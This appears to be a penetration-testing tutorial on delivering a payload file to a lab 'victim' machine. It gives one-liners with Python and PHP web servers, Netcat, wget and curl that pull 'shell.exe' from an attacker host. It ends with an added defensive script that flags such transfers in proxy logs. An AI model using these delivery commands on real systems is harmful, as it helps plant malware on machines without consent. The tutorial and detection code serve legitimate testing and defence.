One-Liner Payload Delivery with Kali & Parrot-Sec OS

Previously we discussed some of the ways through which we can transfer an advanced payload like meterpreter to the victim's machine during penetration testing and red teaming. Today we will see how quickly we can transfer these advanced payloads using some one-liners.

Tools used:
Kali OS
Python 2.7 | 3.7
PHP
Netcat

We can start a Python HTTP server that serves our payload very easily.

root@Pentest-Pundit:~/shells # python -m SimpleHTTPServer 80
or, in Python 3, using the http.server module:
root@Pentest-Pundit:~/shells # python3 -m http.server 80

On the client shell, we can use any command-line fetcher such as Wget or curl. We boot up another Kali machine with the username kali as the victim machine. On this machine (victim), we run the following command to transfer the file.
kali@victim:~$ wget http://192.168.1.80/shell.exe
or
kali@victim:~$ curl http://192.168.1.80/shell.exe --output shell.exe

Here we can see a request from our victim PC in the output of our Python SimpleHTTPServer.


Netcat:
Another way to transfer a file quickly is to use Netcat as a file transfer tool. This will help if the victim already has Netcat installed. 
We will start a Netcat listener on our attacking Kali machine (Pentest-Pundit) with the shell (file) to transfer, redirected with < to our Netcat listener as shown below.
root@Pentest-Pundit:~/shells # nc -nlvp 80 < shell.exe

We boot up another Kali machine with the username kali as the victim machine. On this machine (victim), we run the following command to transfer the file.
kali@victim:~$ nc -nv 192.168.1.80 80 > shell.exe
(UNKNOWN) [192.168.1.80] 80 (http) open

^C

We can confirm the transfer by comparing the file size on the server side and the client side with the ls command.


PHP built-in Web Server:
We can also use PHP's built-in web server to do this task in one line.
root@Pentest-Pundit:~/shells # php -S 192.168.1.80:80 -t /root/shells/
PHP 7.3.12-1 Development Server started on Tue May 5 01:09:14 2020
Listening on http://192.168.1.80:80
Document root is /root/shells
Press Ctrl-C to quit.

On the victim's command shell, we will transfer the shell using wget or curl, as we did before.
kali@victim:~$ wget http://192.168.1.80/shell.exe

After the transfer completes, we can see the request in the output of the PHP built-in web server.
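
For the defending side, the HTTP transfers above leave recognisable traces: Wget and curl send their own User-Agent strings, and Python's http.server and SimpleHTTPServer modules identify themselves as SimpleHTTP in the Server response header. The following triage script is an added example, not part of the original post; the tab-separated log format, the client addresses, the extension watch list and the two-indicator threshold are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample in a hypothetical tab-separated proxy log format:
# client, dest, method, URL path, User-Agent, response Server header
SAMPLE_LOG = "\n".join([
    "192.168.1.50\t192.168.1.80:80\tGET\t/shell.exe\tWget/1.20.3 (linux-gnu)\tSimpleHTTP/0.6 Python/3.7.5",
    "192.168.1.50\t192.168.1.80:80\tGET\t/shell.exe?x=1\tcurl/7.67.0\t-",
    "192.168.1.51\t203.0.113.10:443\tGET\t/index.html\tMozilla/5.0 (X11; Linux x86_64)\tnginx",
    "192.168.1.52\t198.51.100.4:80\tGET\t/pool/curl.deb\tWget/1.20.3 (linux-gnu)\tApache",
    "truncated line without enough fields",
])

CLI_AGENT = re.compile(r"^(wget|curl)/", re.IGNORECASE)
ADHOC_SERVER = re.compile(r"^SimpleHTTP/")         # python -m http.server / SimpleHTTPServer
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".msi")  # assumed watch list, tune per site

def indicators(path, user_agent, server):
    """Return the reasons a single request looks like a command-line tool transfer."""
    reasons = []
    if CLI_AGENT.match(user_agent):
        reasons.append("cli-user-agent")
    # Strip any query string before checking the extension.
    if urlsplit(path).path.lower().endswith(EXECUTABLE_EXT):
        reasons.append("executable-download")
    if ADHOC_SERVER.match(server):
        reasons.append("adhoc-python-server")
    return reasons

def triage(log_text, threshold=2):
    """Return findings for requests matching at least `threshold` indicators."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split("\t")
        if len(fields) != 6:
            continue  # skip malformed or truncated records
        client, dest, _method, path, user_agent, server = fields
        reasons = indicators(path, user_agent, server)
        if len(reasons) >= threshold:
            findings.append({"client": client, "dest": dest,
                             "path": path, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["client"], "->", f["dest"], f["path"], ",".join(f["reasons"]))
```

A single indicator, such as a package download with Wget, stays below the threshold, which keeps routine administrative traffic out of the findings.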
